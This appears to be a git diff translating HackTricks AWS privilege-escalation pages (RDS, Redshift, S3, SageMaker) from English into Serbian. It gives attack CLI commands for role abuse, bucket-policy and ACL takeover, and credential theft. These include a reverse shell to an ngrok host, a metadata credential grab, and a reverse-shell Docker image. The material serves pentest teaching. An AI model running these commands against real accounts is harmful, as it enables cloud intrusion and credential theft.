-> Postgresql **doesn't need to change any parameter group variable** to be able to access S3.
+> Postgresql **ne treba da menja nijednu promenljivu parametarskih grupa** da bi mogao da pristupi S3.
 
 #### Mysql (Aurora)
 
 > [!TIP]
-> Inside a mysql, if you run the query **`SELECT User, Host FROM mysql.user;`** and there is a user called **`rdsadmin`**, you can assume you are inside an **AWS RDS mysql db**.
+> Unutar mysql-a, ako pokrenete upit **`SELECT User, Host FROM mysql.user;`** i postoji korisnik pod imenom **`rdsadmin`**, možete pretpostaviti da ste unutar **AWS RDS mysql db**.
 
-Inside the mysql run **`show variables;`** and if the variables such as **`aws_default_s3_role`**, **`aurora_load_from_s3_role`**, **`aurora_select_into_s3_role`**, have values, you can assume the database is prepared to access S3 data.
+Unutar mysql-a pokrenite **`show variables;`** i ako promenljive kao što su **`aws_default_s3_role`**, **`aurora_load_from_s3_role`**, **`aurora_select_into_s3_role`**, imaju vrednosti, možete pretpostaviti da je baza podataka spremna za pristup S3 podacima.
 
-Also, if you have permissions to run **`aws rds describe-db-clusters`** you can check if the cluster has any **associated role**, which usually means access to AWS services).
-
-Now, to **read a file inside a bucket** you need to know the full path. You can read it with:
+Takođe, ako imate dozvole da pokrenete **`aws rds describe-db-clusters`** možete proveriti da li klaster ima neku **povezanu ulogu**, što obično znači pristup AWS uslugama.
 
+Sada, da biste **pročitali datoteku unutar bucket-a** potrebno je da znate punu putanju. Možete je pročitati sa:
 ```sql
 CREATE TABLE ttemp (col TEXT);
 LOAD DATA FROM S3 's3://mybucket/data.txt' INTO TABLE ttemp(col);
 SELECT * FROM ttemp;
 DROP TABLE ttemp;
 ```
-
 ### `rds:AddRoleToDBCluster`, `iam:PassRole`
 
-An attacker with the permissions `rds:AddRoleToDBCluster` and `iam:PassRole` can **add a specified role to an existing RDS instance**. This could allow the attacker to **access sensitive data** or modify the data within the instance.
-
+Napadač sa dozvolama `rds:AddRoleToDBCluster` i `iam:PassRole` može **dodati određenu ulogu postojećem RDS instanci**. Ovo bi moglo omogućiti napadaču da **pristupi osetljivim podacima** ili izmeni podatke unutar instance.
 ```bash
 aws add-role-to-db-cluster --db-cluster-identifier  --role-arn 
 ```
-
-**Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance.\
-Note that some DBs require additional configs such as Mysql, which needs to specify the role ARN in the aprameter groups also.
+**Potencijalni uticaj**: Pristup osetljivim podacima ili neovlašćene izmene podataka u RDS instanci.\
+Napomena da neki DB-ovi zahtevaju dodatne konfiguracije kao što je Mysql, koji treba da specificira ARN u grupama parametara.
 
 ### `rds:CreateDBInstance`
 
-Just with this permission an attacker could create a **new instance inside a cluster** that already exists and has an **IAM role** attached. He won't be able to change the master user password, but he might be able to expose the new database instance to the internet:
-
+Samo sa ovom dozvolom napadač bi mogao da kreira **novu instancu unutar klastera** koji već postoji i ima **IAM ulogu** prikačenu. Neće moći da promeni lozinku glavnog korisnika, ali bi mogao da izloži novu instancu baze podataka internetu:
 ```bash
 aws --region eu-west-1 --profile none-priv rds create-db-instance \
-    --db-instance-identifier mydbinstance2 \
-    --db-instance-class db.t3.medium \
-    --engine aurora-postgresql \
-    --db-cluster-identifier database-1 \
-    --db-security-groups "string" \
-    --publicly-accessible
+--db-instance-identifier mydbinstance2 \
+--db-instance-class db.t3.medium \
+--engine aurora-postgresql \
+--db-cluster-identifier database-1 \
+--db-security-groups "string" \
+--publicly-accessible
 ```
-
 ### `rds:CreateDBInstance`, `iam:PassRole`
 
 > [!NOTE]
 > TODO: Test
 
-An attacker with the permissions `rds:CreateDBInstance` and `iam:PassRole` can **create a new RDS instance with a specified role attached**. The attacker can then potentially **access sensitive data** or modify the data within the instance.
+Napadač sa dozvolama `rds:CreateDBInstance` i `iam:PassRole` može **napraviti novu RDS instancu sa određenom ulogom**. Napadač može zatim potencijalno **pristupiti osetljivim podacima** ili izmeniti podatke unutar instance.
 
 > [!WARNING]
-> Some requirements of the role/instance-profile to attach (from [**here**](https://docs.aws.amazon.com/cli/latest/reference/rds/create-db-instance.html)):
-
-> - The profile must exist in your account.
-> - The profile must have an IAM role that Amazon EC2 has permissions to assume.
-> - The instance profile name and the associated IAM role name must start with the prefix `AWSRDSCustom` .
+> Neki zahtevi za ulogu/profil instance koji se treba prikačiti (iz [**ovde**](https://docs.aws.amazon.com/cli/latest/reference/rds/create-db-instance.html)):
 
+> - Profil mora postojati u vašem nalogu.
+> - Profil mora imati IAM ulogu koju Amazon EC2 ima dozvolu da preuzme.
+> - Ime profila instance i ime povezane IAM uloge moraju početi sa prefiksom `AWSRDSCustom`.
 ```bash
 aws rds create-db-instance --db-instance-identifier malicious-instance --db-instance-class db.t2.micro --engine mysql --allocated-storage 20 --master-username admin --master-user-password mypassword --db-name mydatabase --vapc-security-group-ids sg-12345678 --db-subnet-group-name mydbsubnetgroup --enable-iam-database-authentication --custom-iam-instance-profile arn:aws:iam::123456789012:role/MyRDSEnabledRole
 ```
-
-**Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance.
+**Potencijalni Uticaj**: Pristup osetljivim podacima ili neovlašćene izmene podataka u RDS instanci.
 
 ### `rds:AddRoleToDBInstance`, `iam:PassRole`
 
-An attacker with the permissions `rds:AddRoleToDBInstance` and `iam:PassRole` can **add a specified role to an existing RDS instance**. This could allow the attacker to **access sensitive data** or modify the data within the instance.
+Napadač sa dozvolama `rds:AddRoleToDBInstance` i `iam:PassRole` može **dodati određenu ulogu postojećoj RDS instanci**. To bi moglo omogućiti napadaču da **pristupi osetljivim podacima** ili izmeni podatke unutar instance.
 
 > [!WARNING]
-> The DB instance must be outside of a cluster for this
-
+> DB instanca mora biti van klastera za ovo
 ```bash
 aws rds add-role-to-db-instance --db-instance-identifier target-instance --role-arn arn:aws:iam::123456789012:role/MyRDSEnabledRole --feature-name 
 ```
-
-**Potential Impact**: Access to sensitive data or unauthorized modifications to the data in the RDS instance.
+**Potencijalni uticaj**: Pristup osetljivim podacima ili neovlašćene izmene podataka u RDS instanci.
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md
index 825c16ad6..d5f080da6 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-redshift-privesc.md
@@ -4,7 +4,7 @@
 
 ## Redshift
 
-For more information about RDS check:
+Za više informacija o RDS proverite:
 
 {{#ref}}
 ../aws-services/aws-redshift-enum.md
@@ -12,52 +12,45 @@ For more information about RDS check:
 
 ### `redshift:DescribeClusters`, `redshift:GetClusterCredentials`
 
-With these permissions you can get **info of all the clusters** (including name and cluster username) and **get credentials** to access it:
-
+Sa ovim dozvolama možete dobiti **informacije o svim klasterima** (uključujući ime i korisničko ime klastera) i **dobiti kredencijale** za pristup:
 ```bash
 # Get creds
 aws redshift get-cluster-credentials --db-user postgres --cluster-identifier redshift-cluster-1
 # Connect, even if the password is a base64 string, that is the password
 psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAM:" -d template1 -p 5439
 ```
-
-**Potential Impact:** Find sensitive info inside the databases.
+**Potencijalni uticaj:** Pronaći osetljive informacije unutar baza podataka.
 
 ### `redshift:DescribeClusters`, `redshift:GetClusterCredentialsWithIAM`
 
-With these permissions you can get **info of all the clusters** and **get credentials** to access it.\
-Note that the postgres user will have the **permissions that the IAM identity** used to get the credentials has.
-
+Sa ovim dozvolama možete dobiti **informacije o svim klasterima** i **dobiti kredencijale** za pristup njima.\
+Imajte na umu da će postgres korisnik imati **dozvole koje ima IAM identitet** korišćen za dobijanje kredencijala.
 ```bash
 # Get creds
 aws redshift get-cluster-credentials-with-iam --cluster-identifier redshift-cluster-1
 # Connect, even if the password is a base64 string, that is the password
 psql -h redshift-cluster-1.asdjuezc439a.us-east-1.redshift.amazonaws.com -U "IAMR:AWSReservedSSO_AdministratorAccess_4601154638985c45" -d template1 -p 5439
 ```
-
-**Potential Impact:** Find sensitive info inside the databases.
+**Potencijalni uticaj:** Pronaći osetljive informacije unutar baza podataka.
 
 ### `redshift:DescribeClusters`, `redshift:ModifyCluster?`
 
-It's possible to **modify the master password** of the internal postgres (redshit) user from aws cli (I think those are the permissions you need but I haven't tested them yet):
-
+Moguće je **izmeniti glavnu lozinku** internog postgres (redshit) korisnika putem aws cli (mislim da su to dozvole koje su vam potrebne, ali ih još nisam testirao):
 ```
 aws redshift modify-cluster –cluster-identifier  –master-user-password ‘master-password’;
 ```
+**Potencijalni Uticaj:** Pronaći osetljive informacije unutar baza podataka.
 
-**Potential Impact:** Find sensitive info inside the databases.
-
-## Accessing External Services
+## Pristup Eksternim Uslugama
 
 > [!WARNING]
-> To access all the following resources, you will need to **specify the role to use**. A Redshift cluster **can have assigned a list of AWS roles** that you can use **if you know the ARN** or you can just set "**default**" to use the default one assigned.
+> Da biste pristupili svim sledećim resursima, moraćete da **navedete ulogu koju želite da koristite**. Redshift klaster **može imati dodeljenu listu AWS uloga** koje možete koristiti **ako znate ARN** ili možete jednostavno postaviti "**default**" da biste koristili podrazumevanu.
 
-> Moreover, as [**explained here**](https://docs.aws.amazon.com/redshift/latest/mgmt/authorizing-redshift-service.html), Redshift also allows to concat roles (as long as the first one can assume the second one) to get further access but just **separating** them with a **comma**: `iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';`
+> Pored toga, kao što je [**objašnjeno ovde**](https://docs.aws.amazon.com/redshift/latest/mgmt/authorizing-redshift-service.html), Redshift takođe omogućava da se uloge kombinuju (pod uslovom da prva može da preuzme drugu) kako bi se dobio dalji pristup, ali samo **razdvajanjem** njih sa **zarezom**: `iam_role 'arn:aws:iam::123456789012:role/RoleA,arn:aws:iam::210987654321:role/RoleB';`
 
 ### Lambdas
 
-As explained in [https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html](https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html), it's possible to **call a lambda function from redshift** with something like:
-
+Kao što je objašnjeno u [https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html](https://docs.aws.amazon.com/redshift/latest/dg/r_CREATE_EXTERNAL_FUNCTION.html), moguće je **pozvati lambda funkciju iz redshifta** sa nečim poput:
 ```sql
 CREATE EXTERNAL FUNCTION exfunc_sum2(INT,INT)
 RETURNS INT
@@ -65,11 +58,9 @@ STABLE
 LAMBDA 'lambda_function'
 IAM_ROLE default;
 ```
-
 ### S3
 
-As explained in [https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html](https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html), it's possible to **read and write into S3 buckets**:
-
+Kao što je objašnjeno u [https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html](https://docs.aws.amazon.com/redshift/latest/dg/tutorial-loading-run-copy.html), moguće je **čitati i pisati u S3 kante**:
 ```sql
 # Read
 copy table from 's3:///load/key_prefix'
@@ -82,30 +73,23 @@ unload ('select * from venue')
 to 's3://mybucket/tickit/unload/venue_'
 iam_role default;
 ```
-
 ### Dynamo
 
-As explained in [https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html](https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html), it's possible to **get data from dynamodb**:
-
+Kao što je objašnjeno u [https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html](https://docs.aws.amazon.com/redshift/latest/dg/t_Loading-data-from-dynamodb.html), moguće je **dobiti podatke iz dynamodb**:
 ```sql
 copy favoritemovies
 from 'dynamodb://ProductCatalog'
 iam_role 'arn:aws:iam::0123456789012:role/MyRedshiftRole';
 ```
-
 > [!WARNING]
-> The Amazon DynamoDB table that provides the data must be created in the same AWS Region as your cluster unless you use the [REGION](https://docs.aws.amazon.com/redshift/latest/dg/copy-parameters-data-source-s3.html#copy-region) option to specify the AWS Region in which the Amazon DynamoDB table is located.
+> Amazon DynamoDB tabela koja pruža podatke mora biti kreirana u istoj AWS Region kao vaš klaster osim ako ne koristite opciju [REGION](https://docs.aws.amazon.com/redshift/latest/dg/copy-parameters-data-source-s3.html#copy-region) da odredite AWS Region u kojem se nalazi Amazon DynamoDB tabela.
 
 ### EMR
 
-Check [https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html](https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html)
+Proverite [https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html](https://docs.aws.amazon.com/redshift/latest/dg/loading-data-from-emr.html)
 
 ## References
 
 - [https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a](https://gist.github.com/kmcquade/33860a617e651104d243c324ddf7992a)
 
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md
index 0af161cbc..8493add64 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-s3-privesc.md
@@ -6,117 +6,112 @@
 
 ### `s3:PutBucketNotification`, `s3:PutObject`, `s3:GetObject`
 
-An attacker with those permissions over interesting buckets might be able to hijack resources and escalate privileges.
-
-For example, an attacker with those **permissions over a cloudformation bucket** called "cf-templates-nohnwfax6a6i-us-east-1" will be able to hijack the deployment. The access can be given with the following policy:
+Napadač sa tim dozvolama nad zanimljivim kanticama može biti u mogućnosti da preuzme resurse i eskalira privilegije.
 
+Na primer, napadač sa tim **dozvolama nad cloudformation kanticom** pod nazivom "cf-templates-nohnwfax6a6i-us-east-1" će moći da preuzme implementaciju. Pristup se može dati sledećom politikom:
 ```json
 {
-  "Version": "2012-10-17",
-  "Statement": [
-    {
-      "Effect": "Allow",
-      "Action": [
-        "s3:PutBucketNotification",
-        "s3:GetBucketNotification",
-        "s3:PutObject",
-        "s3:GetObject"
-      ],
-      "Resource": [
-        "arn:aws:s3:::cf-templates-*/*",
-        "arn:aws:s3:::cf-templates-*"
-      ]
-    },
-    {
-      "Effect": "Allow",
-      "Action": "s3:ListAllMyBuckets",
-      "Resource": "*"
-    }
-  ]
+"Version": "2012-10-17",
+"Statement": [
+{
+"Effect": "Allow",
+"Action": [
+"s3:PutBucketNotification",
+"s3:GetBucketNotification",
+"s3:PutObject",
+"s3:GetObject"
+],
+"Resource": [
+"arn:aws:s3:::cf-templates-*/*",
+"arn:aws:s3:::cf-templates-*"
+]
+},
+{
+"Effect": "Allow",
+"Action": "s3:ListAllMyBuckets",
+"Resource": "*"
+}
+]
 }
 ```
-
-And the hijack is possible because there is a **small time window from the moment the template is uploaded** to the bucket to the moment the **template is deployed**. An attacker might just create a **lambda function** in his account that will **trigger when a bucket notification is sent**, and **hijacks** the **content** of that **bucket**.
+I otmica je moguća jer postoji **mali vremenski prozor od trenutka kada je šablon otpremljen** u bucket do trenutka kada je **šablon implementiran**. Napadač može jednostavno da kreira **lambda funkciju** u svom nalogu koja će **aktivirati kada se pošalje obaveštenje iz bucketa**, i **otme** **sadržaj** tog **bucketa**.
 
 ![](<../../../images/image (174).png>)
 
-The Pacu module [`cfn__resouce_injection`](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#cfn__resource_injection) can be used to automate this attack.\
-For mor informatino check the original research: [https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/](https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/)
+Pacu modul [`cfn__resouce_injection`](https://github.com/RhinoSecurityLabs/pacu/wiki/Module-Details#cfn__resource_injection) može se koristiti za automatizaciju ovog napada.\
+Za više informacija pogledajte originalno istraživanje: [https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/](https://rhinosecuritylabs.com/aws/cloud-malware-cloudformation-injection/)
 
 ### `s3:PutObject`, `s3:GetObject` 
 
-These are the permissions to **get and upload objects to S3**. Several services inside AWS (and outside of it) use S3 storage to store **config files**.\
-An attacker with **read access** to them might find **sensitive information** on them.\
-An attacker with **write access** to them could **modify the data to abuse some service and try to escalate privileges**.\
-These are some examples:
+Ovo su dozvole za **preuzimanje i otpremanje objekata na S3**. Nekoliko usluga unutar AWS-a (i van njega) koristi S3 skladište za čuvanje **konfiguracionih fajlova**.\
+Napadač sa **pristupom za čitanje** može pronaći **osetljive informacije** u njima.\
+Napadač sa **pristupom za pisanje** mogao bi **modifikovati podatke da bi zloupotrebio neku uslugu i pokušao da eskalira privilegije**.\
+Evo nekoliko primera:
 
-- If an EC2 instance is storing the **user data in a S3 bucket**, an attacker could modify it to **execute arbitrary code inside the EC2 instance**.
+- Ako EC2 instanca čuva **korisničke podatke u S3 bucket-u**, napadač bi mogao da ih modifikuje da **izvrši proizvoljan kod unutar EC2 instance**.
 
 ### `s3:PutBucketPolicy`
 
-An attacker, that needs to be **from the same account**, if not the error `The specified method is not allowed will trigger`, with this permission will be able to grant himself more permissions over the bucket(s) allowing him to read, write, modify, delete and expose buckets.
-
+Napadač, koji treba da bude **iz istog naloga**, inače će se aktivirati greška `The specified method is not allowed`, sa ovom dozvolom će moći da sebi dodeli više dozvola nad bucket-ima omogućavajući mu da čita, piše, modifikuje, briše i izlaže buckete.
 ```bash
 # Update Bucket policy
 aws s3api put-bucket-policy --policy file:///root/policy.json --bucket 
 
 ## JSON giving permissions to a user and mantaining some previous root access
 {
-    "Id": "Policy1568185116930",
-    "Version":"2012-10-17",
-    "Statement":[
-        {
-            "Effect":"Allow",
-            "Principal":{
-                "AWS":"arn:aws:iam::123123123123:root"
-            },
-            "Action":"s3:ListBucket",
-            "Resource":"arn:aws:s3:::somebucketname"
-        },
-        {
-            "Effect":"Allow",
-            "Principal":{
-                "AWS":"arn:aws:iam::123123123123:user/username"
-            },
-            "Action":"s3:*",
-            "Resource":"arn:aws:s3:::somebucketname/*"
-        }
-    ]
+"Id": "Policy1568185116930",
+"Version":"2012-10-17",
+"Statement":[
+{
+"Effect":"Allow",
+"Principal":{
+"AWS":"arn:aws:iam::123123123123:root"
+},
+"Action":"s3:ListBucket",
+"Resource":"arn:aws:s3:::somebucketname"
+},
+{
+"Effect":"Allow",
+"Principal":{
+"AWS":"arn:aws:iam::123123123123:user/username"
+},
+"Action":"s3:*",
+"Resource":"arn:aws:s3:::somebucketname/*"
+}
+]
 }
 
 ## JSON Public policy example
 ### IF THE S3 BUCKET IS PROTECTED FROM BEING PUBLICLY EXPOSED, THIS WILL THROW AN ACCESS DENIED EVEN IF YOU HAVE ENOUGH PERMISSIONS
 {
-  "Id": "Policy1568185116930",
-  "Version": "2012-10-17",
-  "Statement": [
-  {
-      "Sid": "Stmt1568184932403",
-      "Action": [
-        "s3:ListBucket"
-      ],
-      "Effect": "Allow",
-      "Resource": "arn:aws:s3:::welcome",
-      "Principal": "*"
-  },
-  {
-    "Sid": "Stmt1568185007451",
-    "Action": [
-      "s3:GetObject"
-    ],
-    "Effect": "Allow",
-    "Resource": "arn:aws:s3:::welcome/*",
-    "Principal": "*"
-  }
-  ]
+"Id": "Policy1568185116930",
+"Version": "2012-10-17",
+"Statement": [
+{
+"Sid": "Stmt1568184932403",
+"Action": [
+"s3:ListBucket"
+],
+"Effect": "Allow",
+"Resource": "arn:aws:s3:::welcome",
+"Principal": "*"
+},
+{
+"Sid": "Stmt1568185007451",
+"Action": [
+"s3:GetObject"
+],
+"Effect": "Allow",
+"Resource": "arn:aws:s3:::welcome/*",
+"Principal": "*"
+}
+]
 }
 ```
-
 ### `s3:GetBucketAcl`, `s3:PutBucketAcl`
 
-An attacker could abuse these permissions to **grant him more access** over specific buckets.\
-Note that the attacker doesn't need to be from the same account. Moreover the write access
-
+Napadač bi mogao da zloupotrebi ove dozvole da **dodeli sebi veći pristup** određenim kanticama.\
+Imajte na umu da napadač ne mora biti iz istog naloga. Pored toga, pristup za pisanje
 ```bash
 # Update bucket ACL
 aws s3api get-bucket-acl --bucket 
@@ -125,27 +120,25 @@ aws s3api put-bucket-acl --bucket  --access-control-policy file://a
 ##JSON ACL example
 ## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved.
 {
-  "Owner": {
-    "DisplayName": "",
-    "ID": ""
-  },
-  "Grants": [
-  {
-    "Grantee": {
-      "Type": "Group",
-      "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
-    },
-  "Permission": "FULL_CONTROL"
-  }
-  ]
+"Owner": {
+"DisplayName": "",
+"ID": ""
+},
+"Grants": [
+{
+"Grantee": {
+"Type": "Group",
+"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
+},
+"Permission": "FULL_CONTROL"
+}
+]
 }
 ## An ACL should give you the permission WRITE_ACP to be able to put a new ACL
 ```
-
 ### `s3:GetObjectAcl`, `s3:PutObjectAcl`
 
-An attacker could abuse these permissions to grant him more access over specific objects inside buckets.
-
+Napadač bi mogao da zloupotrebi ove dozvole da mu dodeli više pristupa određenim objektima unutar kanti.
 ```bash
 # Update bucket object ACL
 aws s3api get-object-acl --bucket  --key flag
@@ -154,34 +147,27 @@ aws s3api put-object-acl --bucket  --key flag --access-control-poli
 ##JSON ACL example
 ## Make sure to modify the Owner’s displayName and ID according to the Object ACL you retrieved.
 {
-  "Owner": {
-    "DisplayName": "",
-    "ID": ""
-  },
-  "Grants": [
-  {
-    "Grantee": {
-      "Type": "Group",
-      "URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
-    },
-  "Permission": "FULL_CONTROL"
-  }
-  ]
+"Owner": {
+"DisplayName": "",
+"ID": ""
+},
+"Grants": [
+{
+"Grantee": {
+"Type": "Group",
+"URI": "http://acs.amazonaws.com/groups/global/AuthenticatedUsers"
+},
+"Permission": "FULL_CONTROL"
+}
+]
 }
 ## An ACL should give you the permission WRITE_ACP to be able to put a new ACL
 ```
-
 ### `s3:GetObjectAcl`, `s3:PutObjectVersionAcl`
 
-An attacker with these privileges is expected to be able to put an Acl to an specific object version
-
+Napadač sa ovim privilegijama se očekuje da može da postavi Acl za određenu verziju objekta.
 ```bash
 aws s3api get-object-acl --bucket  --key flag
 aws s3api put-object-acl --bucket  --key flag --version-id  --access-control-policy file://objacl.json
 ```
-
 {{#include ../../../banners/hacktricks-training.md}}
-
-
-
-
diff --git a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md
index 890686262..ddcd33930 100644
--- a/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md
+++ b/src/pentesting-cloud/aws-security/aws-privilege-escalation/aws-sagemaker-privesc.md
@@ -4,70 +4,62 @@
 
 {{#include ../../../banners/hacktricks-training.md}}
 
-### `iam:PassRole` , `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl`
-
-Start creating a noteboook with the IAM Role to access attached to it:
+### `iam:PassRole`, `sagemaker:CreateNotebookInstance`, `sagemaker:CreatePresignedNotebookInstanceUrl`
 
+Počnite sa kreiranjem beležnice sa IAM rolom koja je povezana sa njom:
 ```bash
 aws sagemaker create-notebook-instance --notebook-instance-name example \
-    --instance-type ml.t2.medium \
-    --role-arn arn:aws:iam:::role/service-role/
+--instance-type ml.t2.medium \
+--role-arn arn:aws:iam:::role/service-role/
 ```
-
-The response should contain a `NotebookInstanceArn` field, which will contain the ARN of the newly created notebook instance. We can then use the `create-presigned-notebook-instance-url` API to generate a URL that we can use to access the notebook instance once it's ready:
-
+Odgovor bi trebao sadržati polje `NotebookInstanceArn`, koje će sadržati ARN novokreiranog notebook instance. Zatim možemo koristiti `create-presigned-notebook-instance-url` API da generišemo URL koji možemo koristiti za pristup notebook instance kada bude spreman:
 ```bash
 aws sagemaker create-presigned-notebook-instance-url \
-    --notebook-instance-name 
+--notebook-instance-name 
 ```
+Navigirajte do URL-a u pretraživaču i kliknite na \`Open JupyterLab\` u gornjem desnom uglu, zatim se pomerite do taba “Launcher” i u sekciji “Other” kliknite na dugme “Terminal”.
 
-Navigate to the URL with the browser and click on \`Open JupyterLab\`\` in the top right, then scroll down to “Launcher” tab and under the “Other” section, click the “Terminal” button.
+Sada je moguće pristupiti metapodacima akreditiva IAM Role.
 
-Now It's possible to access the metadata credentials of the IAM Role.
-
-**Potential Impact:** Privesc to the sagemaker service role specified.
+**Potencijalni uticaj:** Privesc na sagemaker servisnu ulogu koja je navedena.
 
 ### `sagemaker:CreatePresignedNotebookInstanceUrl`
 
-If there are Jupyter **notebooks are already running** on it and you can list them with `sagemaker:ListNotebookInstances` (or discover them in any other way). You can **generate a URL for them, access them, and steal the credentials as indicated in the previous technique**.
-
+Ako su Jupyter **notebook-ovi već pokrenuti** na njemu i možete ih nabrojati sa `sagemaker:ListNotebookInstances` (ili ih otkriti na bilo koji drugi način). Možete **generisati URL za njih, pristupiti im i ukrasti akreditive kao što je navedeno u prethodnoj tehnici**.
 ```bash
 aws sagemaker create-presigned-notebook-instance-url --notebook-instance-name 
 ```
-
-**Potential Impact:** Privesc to the sagemaker service role attached.
+**Potencijalni Uticaj:** Privesc na sagemaker servisnu ulogu koja je povezana.
 
 ### `sagemaker:CreateProcessingJob,iam:PassRole`
 
-An attacker with those permissions can make **sagemaker execute a processingjob** with a sagemaker role attached to it. The attacked can indicate the definition of the container that will be run in an **AWS managed ECS account instance**, and **steal the credentials of the IAM role attached**.
-
+Napadač sa tim dozvolama može da **natera sagemaker da izvrši processingjob** sa sagemaker ulogom povezanu. Napadač može da naznači definiciju kontejnera koji će biti pokrenut u **AWS upravljanom ECS nalogu**, i **ukrade kredencijale IAM uloge koja je povezana**.
 ```bash
 # I uploaded a python docker image to the ECR
 aws sagemaker create-processing-job \
-    --processing-job-name privescjob \
-    --processing-resources '{"ClusterConfig": {"InstanceCount": 1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \
-    --app-specification "{\"ImageUri\":\".dkr.ecr.eu-west-1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \
-    --role-arn 
+--processing-job-name privescjob \
+--processing-resources '{"ClusterConfig": {"InstanceCount": 1,"InstanceType": "ml.t3.medium","VolumeSizeInGB": 50}}' \
+--app-specification "{\"ImageUri\":\".dkr.ecr.eu-west-1.amazonaws.com/python\",\"ContainerEntrypoint\":[\"sh\", \"-c\"],\"ContainerArguments\":[\"/bin/bash -c \\\"bash -i >& /dev/tcp/5.tcp.eu.ngrok.io/14920 0>&1\\\"\"]}" \
+--role-arn 
 
 # In my tests it took 10min to receive the shell
 curl "http://169.254.170.2$AWS_CONTAINER_CREDENTIALS_RELATIVE_URI" #To get the creds
 ```
-
-**Potential Impact:** Privesc to the sagemaker service role specified.
+**Potencijalni Uticaj:** Privesc na sagemaker servisnu ulogu koja je navedena.
 
 ### `sagemaker:CreateTrainingJob`, `iam:PassRole`
 
-An attacker with those permissions will be able to create a training job, **running an arbitrary container** on it with a **role attached** to it. Therefore, the attcke will be able to steal the credentials of the role.
+Napadač sa tim dozvolama će moći da kreira obuku, **pokrećući proizvoljni kontejner** na njemu sa **priključenom ulogom**. Stoga, napadač će moći da ukrade kredencijale te uloge.
 
 > [!WARNING]
-> This scenario is more difficult to exploit than the previous one because you need to generate a Docker image that will send the rev shell or creds directly to the attacker (you cannot indicate a starting command in the configuration of the training job).
+> Ovaj scenario je teže iskoristiti nego prethodni jer morate da generišete Docker sliku koja će slati rev shell ili kredencijale direktno napadaču (ne možete da navedete početnu komandu u konfiguraciji obuke).
 >
 > ```bash
-> # Create docker image
+> # Kreirajte docker sliku
 > mkdir /tmp/rev
-> ## Note that the trainning job is going to call an executable called "train"
-> ## That's why I'm putting the rev shell in /bin/train
-> ## Set the values of  and 
+> ## Imajte na umu da će obuka pozvati izvršnu datoteku pod nazivom "train"
+> ## Zato stavljam rev shell u /bin/train
+> ## Postavite vrednosti  i 
 > cat > /tmp/rev/Dockerfile < FROM ubuntu
 > RUN apt update && apt install -y ncat curl
@@ -79,40 +71,34 @@ An attacker with those permissions will be able to create a training job, **runn
 > cd /tmp/rev
 > sudo docker build . -t reverseshell
 >
-> # Upload it to ECR
+> # Učitajte ga u ECR
 > sudo docker login -u AWS -p $(aws ecr get-login-password --region ) .dkr.ecr..amazonaws.com/
 > sudo docker tag reverseshell:latest .dkr.ecr..amazonaws.com/reverseshell:latest
 > sudo docker push .dkr.ecr..amazonaws.com/reverseshell:latest
 > ```
-
 ```bash
 # Create trainning job with the docker image created
 aws sagemaker create-training-job \
-    --training-job-name privescjob \
-    --resource-config '{"InstanceCount": 1,"InstanceType": "ml.m4.4xlarge","VolumeSizeInGB": 50}' \
-    --algorithm-specification '{"TrainingImage":".dkr.ecr..amazonaws.com/reverseshell", "TrainingInputMode": "Pipe"}' \
-    --role-arn  \
-    --output-data-config '{"S3OutputPath": "s3://"}' \
-    --stopping-condition '{"MaxRuntimeInSeconds": 600}'
+--training-job-name privescjob \
+--resource-config '{"InstanceCount": 1,"InstanceType": "ml.m4.4xlarge","VolumeSizeInGB": 50}' \
+--algorithm-specification '{"TrainingImage":".dkr.ecr..amazonaws.com/reverseshell", "TrainingInputMode": "Pipe"}' \
+--role-arn  \
+--output-data-config '{"S3OutputPath": "s3://"}' \
